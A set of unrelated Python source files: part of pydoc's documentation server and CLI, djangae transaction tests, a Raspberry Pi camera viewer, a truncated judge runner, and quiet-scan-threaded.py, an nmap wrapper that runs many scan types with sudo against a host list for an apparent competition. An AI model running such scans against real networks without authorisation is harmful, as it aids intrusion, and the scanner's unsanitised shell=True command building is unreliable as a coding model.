orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = tkinter.Frame(window)
self.goto_btn = tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
import webbrowser
webbrowser.open(url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = self.result_lst.get(selection[0]).split()[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import tkinter
try:
root = tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
# file and the root has is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# --------------------------------------- enhanced Web browser interface
def _start_server(urlhandler, port):
"""Start an HTTP server thread on a specific port.
Start an HTML/text server thread, so HTML or text documents can be
browsed dynamically and interactively with a Web browser. Example use:
>>> import time
>>> import pydoc
Define a URL handler. To determine what the client is asking
for, check the URL and content_type.
Then get or generate some text or HTML code and return it.
>>> def my_url_handler(url, content_type):
... text = 'the URL sent was: (%s, %s)' % (url, content_type)
... return text
Start server thread on port 0.
If you use port 0, the server will pick a random port number.
You can then use serverthread.port to get the port number.
>>> port = 0
>>> serverthread = pydoc._start_server(my_url_handler, port)
Check that the server is really started. If it is, open browser
and get first page. Use serverthread.url as the starting page.
>>> if serverthread.serving:
... import webbrowser
The next two lines are commented out so a browser doesn't open if
doctest is run on this module.
#... webbrowser.open(serverthread.url)
#True
Let the server do its thing. We just need to monitor its status.
Use time.sleep so the loop doesn't hog the CPU.
>>> starttime = time.time()
>>> timeout = 1 #seconds
This is a short timeout for testing purposes.
>>> while serverthread.serving:
... time.sleep(.01)
... if serverthread.serving and time.time() - starttime > timeout:
... serverthread.stop()
... break
Print any errors that may have occurred.
>>> print(serverthread.error)
None
"""
import http.server
import email.message
import select
import threading
class DocHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
"""Process a request from an HTML browser.
The URL received is in self.path.
Get an HTML page from self.urlhandler and send it.
"""
if self.path.endswith('.css'):
content_type = 'text/css'
else:
content_type = 'text/html'
self.send_response(200)
self.send_header('Content-Type', '%s; charset=UTF-8' % content_type)
self.end_headers()
self.wfile.write(self.urlhandler(
self.path, content_type).encode('utf-8'))
def log_message(self, *args):
# Don't log messages.
pass
class DocServer(http.server.HTTPServer):
def __init__(self, port, callback):
self.host = (sys.platform == 'mac') and '127.0.0.1' or 'localhost'
self.address = ('', port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
self.quit = False
def serve_until_quit(self):
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd:
self.handle_request()
self.server_close()
def server_activate(self):
self.base.server_activate(self)
if self.callback:
self.callback(self)
class ServerThread(threading.Thread):
def __init__(self, urlhandler, port):
self.urlhandler = urlhandler
self.port = int(port)
threading.Thread.__init__(self)
self.serving = False
self.error = None
def run(self):
"""Start the server."""
try:
DocServer.base = http.server.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = email.message.Message
DocHandler.urlhandler = staticmethod(self.urlhandler)
docsvr = DocServer(self.port, self.ready)
self.docserver = docsvr
docsvr.serve_until_quit()
except Exception as e:
self.error = e
def ready(self, server):
self.serving = True
self.host = server.host
self.port = server.server_port
self.url = 'http://%s:%d/' % (self.host, self.port)
def stop(self):
"""Stop the server and this thread nicely"""
self.docserver.quit = True
self.serving = False
self.url = None
thread = ServerThread(urlhandler, port)
thread.start()
# Wait until thread.serving is True to make sure we are
# really up before returning.
while not thread.error and not thread.serving:
time.sleep(.01)
return thread
def _url_handler(url, content_type="text/html"):
"""The pydoc url handler for use with the pydoc server.
If the content_type is 'text/css', the _pydoc.css style
sheet is read and returned if it exits.
If the content_type is 'text/html', then the result of
get_html_page(url) is returned.
"""
class _HTMLDoc(HTMLDoc):
def page(self, title, contents):
"""Format an HTML page."""
css_path = "pydoc_data/_pydoc.css"
css_link = (
'<link rel="stylesheet" type="text/css" href="%s">' %
css_path)
return '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Pydoc: %s</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
%s</head><body bgcolor="#f0f0f8">%s<div style="clear:both;padding-top:.5em;">%s</div>
</body></html>''' % (title, css_link, html_navbar(), contents)
def filelink(self, url, path):
return '<a href="getfile?key=%s">%s</a>' % (url, path)
html = _HTMLDoc()
def html_navbar():
version = html.escape("%s [%s, %s]" % (platform.python_version(),
platform.python_build()[0],
platform.python_compiler()))
return """
<div style='float:left'>
Python %s<br>%s
</div>
<div style='float:right'>
<div style='text-align:center'>
<a href="index.html">Module Index</a>
: <a href="topics.html">Topics</a>
: <a href="keywords.html">Keywords</a>
</div>
<div>
<form action="get" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Get">
</form>
<form action="search" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Search">
</form>
</div>
</div>
""" % (version, html.escape(platform.platform(terse=True)))
def html_index():
"""Module Index page."""
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
heading = html.heading(
'<big><big><strong>Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
names = [name for name in sys.builtin_module_names
if name != '__main__']
contents = html.multicolumn(names, bltinlink)
contents = [heading, '<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
contents.append(html.index(dir, seen))
contents.append(
'<p align=right><font color="#909090" face="helvetica,'
'arial"><strong>pydoc</strong> by Ka-Ping Yee'
'<ping@lfw.org></font>')
return 'Index of Modules', ''.join(contents)
def html_search(key):
"""Search results page."""
# scan for modules
search_result = []
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
search_result.append((modname, desc and '- ' + desc))
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key)
# format page
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
results = []
heading = html.heading(
'<big><big><strong>Search Results</strong></big></big>',
'#ffffff', '#7799ee')
for name, desc in search_result:
results.append(bltinlink(name) + desc)
contents = heading + html.bigsection(
'key = %s' % key, '#ffffff', '#ee77aa', '<br>'.join(results))
return 'Search Results', contents
def html_getfile(path):
"""Get and display a source file listing safely."""
path = path.replace('%20', ' ')
with open(path, 'r') as fp:
lines = html.escape(fp.read())
body = '<pre>%s</pre>' % lines
heading = html.heading(
'<big><big><strong>File Listing</strong></big></big>',
'#ffffff', '#7799ee')
contents = heading + html.bigsection(
'File: %s' % path, '#ffffff', '#ee77aa', body)
return 'getfile %s' % path, contents
def html_topics():
"""Index of topic texts available."""
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
heading = html.heading(
'<big><big><strong>INDEX</strong></big></big>',
'#ffffff', '#7799ee')
names = sorted(Helper.topics.keys())
contents = html.multicolumn(names, bltinlink)
contents = heading + html.bigsection(
'Topics', '#ffffff', '#ee77aa', contents)
return 'Topics', contents
def html_keywords():
"""Index of keywords."""
heading = html.heading(
'<big><big><strong>INDEX</strong></big></big>',
'#ffffff', '#7799ee')
names = sorted(Helper.keywords.keys())
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
contents = html.multicolumn(names, bltinlink)
contents = heading + html.bigsection(
'Keywords', '#ffffff', '#ee77aa', contents)
return 'Keywords', contents
def html_topicpage(topic):
"""Topic or keyword help page."""
buf = io.StringIO()
htmlhelp = Helper(buf, buf)
contents, xrefs = htmlhelp._gettopic(topic)
if topic in htmlhelp.keywords:
title = 'KEYWORD'
else:
title = 'TOPIC'
heading = html.heading(
'<big><big><strong>%s</strong></big></big>' % title,
'#ffffff', '#7799ee')
contents = '<pre>%s</pre>' % html.markup(contents)
contents = html.bigsection(topic , '#ffffff','#ee77aa', contents)
if xrefs:
xrefs = sorted(xrefs.split())
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
xrefs = html.multicolumn(xrefs, bltinlink)
xrefs = html.section('Related help topics: ',
'#ffffff', '#ee77aa', xrefs)
return ('%s %s' % (title, topic),
''.join((heading, contents, xrefs)))
def html_getobj(url):
obj = locate(url, forceload=1)
if obj is None and url != 'None':
raise ValueError('could not find object')
title = describe(obj)
content = html.document(obj, url)
return title, content
def html_error(url, exc):
heading = html.heading(
'<big><big><strong>Error</strong></big></big>',
'#ffffff', '#7799ee')
contents = '<br>'.join(html.escape(line) for line in
format_exception_only(type(exc), exc))
contents = heading + html.bigsection(url, '#ffffff', '#bb0000',
contents)
return "Error - %s" % url, contents
def get_html_page(url):
"""Generate an HTML page for url."""
complete_url = url
if url.endswith('.html'):
url = url[:-5]
try:
if url in ("", "index"):
title, content = html_index()
elif url == "topics":
title, content = html_topics()
elif url == "keywords":
title, content = html_keywords()
elif '=' in url:
op, _, url = url.partition('=')
if op == "search?key":
title, content = html_search(url)
elif op == "getfile?key":
title, content = html_getfile(url)
elif op == "topic?key":
# try topics first, then objects.
try:
title, content = html_topicpage(url)
except ValueError:
title, content = html_getobj(url)
elif op == "get?key":
# try objects first, then topics.
if url in ("", "index"):
title, content = html_index()
else:
try:
title, content = html_getobj(url)
except ValueError:
title, content = html_topicpage(url)
else:
raise ValueError('bad pydoc url')
else:
title, content = html_getobj(url)
except Exception as exc:
# Catch any errors and display them in an error page.
title, content = html_error(complete_url, exc)
return html.page(title, content)
if url.startswith('/'):
url = url[1:]
if content_type == 'text/css':
path_here = os.path.dirname(os.path.realpath(__file__))
css_path = os.path.join(path_here, url)
with open(css_path) as fp:
return ''.join(fp.readlines())
elif content_type == 'text/html':
return get_html_page(url)
# Errors outside the url handler are caught by the server.
raise TypeError('unknown content type %r for url %s' % (content_type, url))
def browse(port=0, *, open_browser=True):
"""Start the enhanced pydoc Web server and open a Web browser.
Use port '0' to start the server on an arbitrary port.
Set open_browser to False to suppress opening a browser.
"""
import webbrowser
serverthread = _start_server(_url_handler, port)
if serverthread.error:
print(serverthread.error)
return
if serverthread.serving:
server_help_msg = 'Server commands: [b]rowser, [q]uit'
if open_browser:
webbrowser.open(serverthread.url)
try:
print('Server ready at', serverthread.url)
print(server_help_msg)
while serverthread.serving:
cmd = input('server> ')
cmd = cmd.lower()
if cmd == 'q':
break
elif cmd == 'b':
webbrowser.open(serverthread.url)
else:
print(server_help_msg)
except (KeyboardInterrupt, EOFError):
print()
finally:
if serverthread.serving:
serverthread.stop()
print('Server stopped')
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and x.find(os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage(Exception): pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'bgk:p:w')
writing = False
start_server = False
open_browser = False
port = None
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-b':
start_server = True
open_browser = True
if opt == '-k':
apropos(val)
return
if opt == '-p':
start_server = True
port = val
if opt == '-w':
writing = True
if start_server == True:
if port == None:
port = 0
browse(port, open_browser=open_browser)
return
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print('file %r does not exist' % arg)
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport as value:
print(value)
except (getopt.error, BadUsage):
cmd = os.path.splitext(os.path.basename(sys.argv[0]))[0]
print("""pydoc - the Python documentation tool
{cmd} <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '{sep}', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
{cmd} -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
{cmd} -p <port>
Start an HTTP server on the given port on the local machine. Port
number 0 can be used to get an arbitrary unused port.
{cmd} -b
Start an HTTP server on an arbitrary unused port and open a Web browser
to interactively browse documentation. The -p option can be used with
the -b option to explicitly specify the server port.
{cmd} -g
Deprecated.
{cmd} -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '{sep}', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""".format(cmd=cmd, sep=os.sep))
if __name__ == '__main__':
cli()
|
test_transactional.py
|
# STANDARD LIB
import threading
# THIRD PARTY
from google.appengine.runtime import DeadlineExceededError
# DJANGAE
from djangae.db import transaction
from djangae.db.caching import DisableCache
from djangae.contrib import sleuth
from djangae.test import TestCase
class TransactionTests(TestCase):
def test_repeated_usage_in_a_loop(self):
from .test_connector import TestUser
pk = TestUser.objects.create(username="foo").pk
for i in range(4):
with transaction.atomic(xg=True):
TestUser.objects.get(pk=pk)
continue
with transaction.atomic(xg=True):
TestUser.objects.get(pk=pk)
def test_recursive_atomic(self):
lst = []
@transaction.atomic
def txn():
lst.append(True)
if len(lst) == 3:
return
else:
txn()
txn()
def test_recursive_non_atomic(self):
lst = []
@transaction.non_atomic
def txn():
lst.append(True)
if len(lst) == 3:
return
else:
txn()
txn()
def test_atomic_in_separate_thread(self):
""" Regression test. See #668. """
@transaction.atomic
def txn():
return
def target():
txn()
thread = threading.Thread(target=target)
thread.start()
thread.join()
def test_non_atomic_in_separate_thread(self):
""" Regression test. See #668. """
@transaction.non_atomic
def txn():
return
def target():
txn()
thread = threading.Thread(target=target)
thread.start()
thread.join()
def test_atomic_decorator(self):
from .test_connector import TestUser
@transaction.atomic
def txn():
TestUser.objects.create(username="foo", field2="bar")
self.assertTrue(transaction.in_atomic_block())
raise ValueError()
with self.assertRaises(ValueError):
txn()
self.assertEqual(0, TestUser.objects.count())
def test_atomic_decorator_catches_deadlineexceedederror(self):
""" Regression test for #1107 . Make sure DeadlineExceededError causes the transaction to
be rolled back.
"""
from .test_connector import TestUser
@transaction.atomic
def txn():
TestUser.objects.create(username="foo", field2="bar")
self.assertTrue(transaction.in_atomic_block())
raise DeadlineExceededError()
with self.assertRaises(DeadlineExceededError):
txn()
self.assertEqual(0, TestUser.objects.count())
def test_interaction_with_datastore_txn(self):
from google.appengine.ext import db
from google.appengine.datastore.datastore_rpc import TransactionOptions
from .test_connector import TestUser
@db.transactional(propagation=TransactionOptions.INDEPENDENT)
def some_indie_txn(_username):
TestUser.objects.create(username=_username)
@db.transactional()
def some_non_indie_txn(_username):
TestUser.objects.create(username=_username)
@db.transactional()
def double_nested_transactional():
@db.transactional(propagation=TransactionOptions.INDEPENDENT)
def do_stuff():
TestUser.objects.create(username="Double")
raise ValueError()
try:
return do_stuff
except Exception:
return
with transaction.atomic():
double_nested_transactional()
@db.transactional()
def something_containing_atomic():
with transaction.atomic():
TestUser.objects.create(username="Inner")
something_containing_atomic()
with transaction.atomic():
with transaction.atomic():
some_non_indie_txn("Bob1")
some_indie_txn("Bob2")
some_indie_txn("Bob3")
with transaction.atomic(independent=True):
some_non_indie_txn("Fred1")
some_indie_txn("Fred2")
some_indie_txn("Fred3")
def test_atomic_context_manager(self):
from .test_connector import TestUser
with self.assertRaises(ValueError):
with transaction.atomic():
TestUser.objects.create(username="foo", field2="bar")
raise ValueError()
self.assertEqual(0, TestUser.objects.count())
def test_atomic_context_manager_catches_deadlineexceedederror(self):
""" Make sure that DeadlineExceededError causes the transaction to be rolled back when
using atomic() as a context manager.
"""
from .test_connector import TestUser
with self.assertRaises(DeadlineExceededError):
with transaction.atomic():
TestUser.objects.create(username="foo", field2="bar")
raise DeadlineExceededError()
self.assertEqual(0, TestUser.objects.count())
def test_non_atomic_context_manager(self):
from .test_connector import TestUser
existing = TestUser.objects.create(username="existing", field2="exists")
with transaction.atomic():
self.assertTrue(transaction.in_atomic_block())
user = TestUser.objects.create(username="foo", field2="bar")
with transaction.non_atomic():
# We're outside the transaction, so the user should not exist
self.assertRaises(TestUser.DoesNotExist, TestUser.objects.get, pk=user.pk)
self.assertFalse(transaction.in_atomic_block())
with sleuth.watch("google.appengine.api.datastore.Get") as datastore_get:
TestUser.objects.get(pk=existing.pk) # Should hit the cache, not the datastore
self.assertFalse(datastore_get.called)
with transaction.atomic(independent=True):
user2 = TestUser.objects.create(username="foo2", field2="bar2")
self.assertTrue(transaction.in_atomic_block())
with transaction.non_atomic():
self.assertFalse(transaction.in_atomic_block())
self.assertRaises(TestUser.DoesNotExist, TestUser.objects.get, pk=user2.pk)
with transaction.non_atomic():
self.assertFalse(transaction.in_atomic_block())
self.assertRaises(TestUser.DoesNotExist, TestUser.objects.get, pk=user2.pk)
with sleuth.watch("google.appengine.api.datastore.Get") as datastore_get:
# Should hit the cache, not the Datastore
TestUser.objects.get(pk=existing.pk)
self.assertFalse(transaction.in_atomic_block())
self.assertRaises(TestUser.DoesNotExist, TestUser.objects.get, pk=user2.pk)
self.assertTrue(TestUser.objects.filter(pk=user2.pk).exists())
self.assertTrue(transaction.in_atomic_block())
def test_xg_argument(self):
from .test_connector import TestUser, TestFruit
@transaction.atomic(xg=True)
def txn(_username):
TestUser.objects.create(username=_username, field2="bar")
TestFruit.objects.create(name="Apple", color="pink")
raise ValueError()
with self.assertRaises(ValueError):
txn("foo")
self.assertEqual(0, TestUser.objects.count())
self.assertEqual(0, TestFruit.objects.count())
def test_independent_argument(self):
"""
We would get a XG error if the inner transaction was not independent
"""
from .test_connector import TestUser, TestFruit
@transaction.atomic
def txn1(_username, _fruit):
@transaction.atomic(independent=True)
def txn2(_fruit):
TestFruit.objects.create(name=_fruit, color="pink")
raise ValueError()
TestUser.objects.create(username=_username)
txn2(_fruit)
with self.assertRaises(ValueError):
txn1("test", "banana")
def test_nested_decorator(self):
# Nested decorator pattern we discovered can cause a connection_stack
# underflow.
@transaction.atomic
def inner_txn():
pass
@transaction.atomic
def outer_txn():
inner_txn()
# Calling inner_txn first puts it in a state which means it doesn't
# then behave properly in a nested transaction.
inner_txn()
outer_txn()
class TransactionStateTests(TestCase):
def test_has_already_read(self):
from .test_connector import TestFruit
apple = TestFruit.objects.create(name="Apple", color="Red")
pear = TestFruit.objects.create(name="Pear", color="Green")
with transaction.atomic(xg=True) as txn:
self.assertFalse(txn.has_been_read(apple))
self.assertFalse(txn.has_been_read(pear))
apple.refresh_from_db()
self.assertTrue(txn.has_been_read(apple))
self.assertFalse(txn.has_been_read(pear))
with transaction.atomic(xg=True) as txn:
self.assertTrue(txn.has_been_read(apple))
self.assertFalse(txn.has_been_read(pear))
pear.refresh_from_db()
self.assertTrue(txn.has_been_read(pear))
with transaction.atomic(independent=True) as txn2:
self.assertFalse(txn2.has_been_read(apple))
self.assertFalse(txn2.has_been_read(pear))
def test_prevent_read(self):
from .test_connector import TestFruit
apple = TestFruit.objects.create(name="Apple", color="Red")
# Don't allow reading apple within the transaction
with transaction.atomic() as txn:
txn.prevent_read(TestFruit, apple.pk)
self.assertRaises(
transaction.PreventedReadError,
TestFruit.objects.get, pk=apple.pk
)
def test_refresh_if_unread(self):
from .test_connector import TestFruit
apple = TestFruit.objects.create(name="Apple", color="Red")
with transaction.atomic() as txn:
apple.color = "Pink"
txn.refresh_if_unread(apple)
self.assertEqual(apple.name, "Apple")
apple.color = "Pink"
# Already been read this transaction, don't read it again!
txn.refresh_if_unread(apple)
self.assertEqual(apple.color, "Pink")
def test_refresh_if_unread_for_created_objects(self):
""" refresh_if_unread should not refresh objects which have been *created* within the
transaction, as at the DB level they will not exist.
"""
from .test_connector import TestFruit
# With caching
with transaction.atomic() as txn:
apple = TestFruit.objects.create(name="Apple", color="Red")
apple.color = "Pink" # Deliberately don't save
txn.refresh_if_unread(apple)
self.assertEqual(apple.color, "Pink")
# Without caching
with DisableCache():
with transaction.atomic() as txn:
apple = TestFruit.objects.create(name="Radish", color="Red")
apple.color = "Pink" # Deliberately don't save
txn.refresh_if_unread(apple)
self.assertEqual(apple.color, "Pink")
def test_refresh_if_unread_for_resaved_objects(self):
""" refresh_if_unread should not refresh objects which have been re-saved within the
transaction.
"""
from .test_connector import TestFruit
# With caching
apple = TestFruit.objects.create(name="Apple", color="Red")
with transaction.atomic() as txn:
apple.save()
apple.color = "Pink" # Deliberately don't save
txn.refresh_if_unread(apple)
self.assertEqual(apple.color, "Pink")
# Without caching
radish = TestFruit.objects.create(name="Radish", color="Red")
with DisableCache():
with transaction.atomic() as txn:
radish.save()
radish.color = "Pink" # Deliberately don't save
txn.refresh_if_unread(radish)
self.assertEqual(radish.color, "Pink")
def test_non_atomic_only(self):
from .test_connector import TestFruit
apple = TestFruit.objects.create(name="Apple", color="Red")
apple.save()
apple2 = TestFruit.objects.get(pk=apple.pk)
with transaction.non_atomic():
apple.delete()
# Apple should no longer be in the cache!
self.assertRaises(TestFruit.DoesNotExist, apple2.refresh_from_db)
|
picamera.py
|
#!/usr/bin/python2.7
#
# Copyright (C) 2016 by meiraspi@gmail.com published under the MIT License
#
# display pygame window from picamera
#
# http://www.pyimagesearch.com/2015/12/28/increasing-raspberry-pi-fps-with-python-and-opencv/
# https://www.snip2code.com/Snippet/979508/OpenCV-VideoCapture-running-on-PyGame-on
#
from datetime import datetime
from picamera.array import PiRGBArray
from threading import Thread
from pygame.locals import *
from time import sleep
from sys import exit
import numpy as np
import pygame
import picamera
class PiVideoStream:
def __init__(self, resolution=(320, 240), format='rgb', framerate=32, led=True):
# initialize the camera and stream
self.camera = picamera.PiCamera()
self.camera.resolution = resolution
self.camera.framerate = framerate
self.rawCapture = PiRGBArray(self.camera, size=resolution)
self.stream = self.camera.capture_continuous(self.rawCapture, format=format, use_video_port=True)
# initialize the frame and the variable used to indicate if the thread should be stopped
self.frame = None
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
Thread(target=self.update, args=()).start()
self.camera.led = led
return self
def update(self):
# keep looping infinitely until the thread is stopped
for frameBuf in self.stream:
# grab the frame from the stream and clear the stream in
# preparation for the next frame
self.frame = np.rot90(frameBuf.array)
self.rawCapture.truncate(0)
# if the thread indicator variable is set, stop the thread
# and resource camera resources
if self.stopped:
self.camera.led = False
self.stream.close()
self.rawCapture.close()
self.camera.close()
return
def read(self):
# return the frame most recently read
return self.frame
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def update_stream_screen(videostream, screen):
dirtyrects = []
frame = pygame.surfarray.make_surface(videostream.read())
#dirtyrects.append( screen.fill(black) )
dirtyrects.append( screen.blit(frame, (30,30)) )
pygame.display.update(dirtyrects)
if __name__ == '__main__':
width = 640
height = 480
# colors R G B
white = (255, 255, 255)
red = (255, 0, 0)
green = ( 0, 255, 0)
blue = ( 0, 0, 255)
black = ( 0, 0, 0)
cyan = ( 50, 255, 255)
magenta = (255, 0, 255)
yellow = (255, 255, 0)
orange = (255, 127, 0)
size = (width, height)
xmax = width - 2
ymax = height - 1
try:
pygame.init()
window = pygame.display.set_mode(size)
window.fill(black)
pygame.display.set_caption("picamera stream on pygame")
clock = pygame.time.Clock()
vs = PiVideoStream().start()
sleep(0.2)
while True:
clock.tick(30)
for event in pygame.event.get():
if event.type in (QUIT, KEYDOWN):
exit()
update_stream_screen(vs, window)
print 'FRAMERATE: %.3f fps' % clock.get_fps()
except (KeyboardInterrupt, SystemExit):
print 'Quit'
vs.stop()
pygame.quit()
except Exception, error:
print "Error: " + str(error)
exit()
|
quiet-scan-threaded.py
|
#!/usr/bin/env python3
import subprocess
import sys, getopt, os
import threading
import argparse
cwd = os.getcwd()
path = cwd + "/port_scanner_files/"
ip_list_file = path + "input/IP_list.txt"
nmap_output_file = path + "temp_output/nmap_output"
#the scorchedearth option runs every nmap scan that doesn't require an additional host OR standard ping scan
scorchedearth = ["-sS", "-sT", "-sA", "-sW", "-sM", "-sU", "-sN", "-sF", "-sX", "-sY","-sZ", "-sO"]
def module_name():
return "quiet-scan-threaded"
def module_help():
return "quiet port scanner tool (threaded)"
def module_usage():
return "{0}".format(module_name())
def system_call(program_name, args = [], privilege = False):
call = program_name
if(privilege == True):
call = "sudo " + call
for arg in args:
call = call + " " + arg
print(call)
subprocess.call(call, shell=True)
def parse_nmap_output(ipAddr, scantype, nmap_output):
services_list = path + "scan_output/services_list" + "_" + ipAddr + ".txt"
nmap_fp = open(nmap_output, 'r')
line_in = nmap_fp.readline()
while(line_in.find("STATE") == -1 and line_in.find("SERVICE") == -1): #Fixed a bug in this line as it was looping infinitely because the previous check was "STATE SERVICE", but sometimes, we endup in getting an extra space and none of the lines match
line_in = nmap_fp.readline()
if(line_in.lower().find("nmap done") != -1): #when no ports are open we should exit
return
#changed to append, so we can get results from all scan types
services_fp = open(services_list, 'a')
line_in = nmap_fp.readline()
while (line_in and line_in.strip() != ''):
if(line_in.lower().find("closed") != -1): #IF port is closed, continue parsing the next line
line_in = nmap_fp.readline()
continue
str_split = line_in.split('/')
str_split_2 = str_split[-1].split(' ')
line_out_list = []
line_out_list.append(str_split[0])
line_out_list.extend(str_split_2)
line_out = ' '.join(line_out_list)
services_fp.write("Scanned with: " + scantype + "\n")#write what scan produced these results
services_fp.write(line_out)
line_in = nmap_fp.readline()
services_fp.close()
nmap_fp.close()
def buildArgs(argv, line, fileName):
arr = [line.strip()]
if(len(argv) > 0):
arr.extend(argv)
arr.append("-Pn") #controversial addition: we know all the hosts are going to be online because of the game rules, so adding this skips the host discovery
arr.extend([">", fileName])
return arr
def nmap_worker(line, scantype, standard_args):
#since we are appending multiple scan results to one file, zero out the file before start
line = line.strip()
services_list = path + "scan_output/services_list" + "_" + line + ".txt"
services_fp = open(services_list, 'w')
services_fp.close()
if ("scortchedearth" in scantype) or ("se" in scantype):
scantype = scorchedearth
for scan in scantype:
print("Starting NMAP Thread for " + line +":" + " Scantype: " + scan)
fileName = nmap_output_file + "_" + line + ".txt"
system_call(("nmap " + scan), buildArgs(standard_args, line, fileName), True) #-p- to scan all the ports
parse_nmap_output(line, scan, fileName)
def main():
with open(ip_list_file ,'r') as file:
line = file.readline()
#New calling convention is two lists of arguments: the scan type and whatever other arguments there are
#example python3 quiet-scan-threaded.py --scantype "-sS -sN" --options "-p 80 -sV"
parser = argparse.ArgumentParser()
parser.add_argument('--scantype', dest= 'scantype', required=True, help="List all scan types here. Format as if callingi n nmap ie -sS -Su -sM' etc. To automatically run all scan types enter 'scortchedearth' or 'se'")
parser.add_argument('--options', dest= 'standard_args', nargs='+', required=True, help="All options other than scan type listed here, just as if calling nmap from the commandline")
args = parser.parse_args()
standard_args = args.standard_args
scans = args.scantype
scantype = scans.split(' ')
while line:
t = threading.Thread(target=nmap_worker, args=(line, scantype, standard_args))
t.start()
line = file.readline()
if __name__ == "__main__":
main()
|
main.py
|
from threading import Timer, Thread
import time
import os
import sys
def kill():
print("TLE")
exit(1)
testCases = int(sys.argv[1])
timeLimit = int(sys.argv[2])
def runCode(timeout):
if os.system("javac /source/code.java > /source/out/compile_out.txt 2> /source/out/compile_error.txt") != 0:
print("compile_error")
timeout.cancel()
exit(1)
for i in range(testCases):
result = "ok"
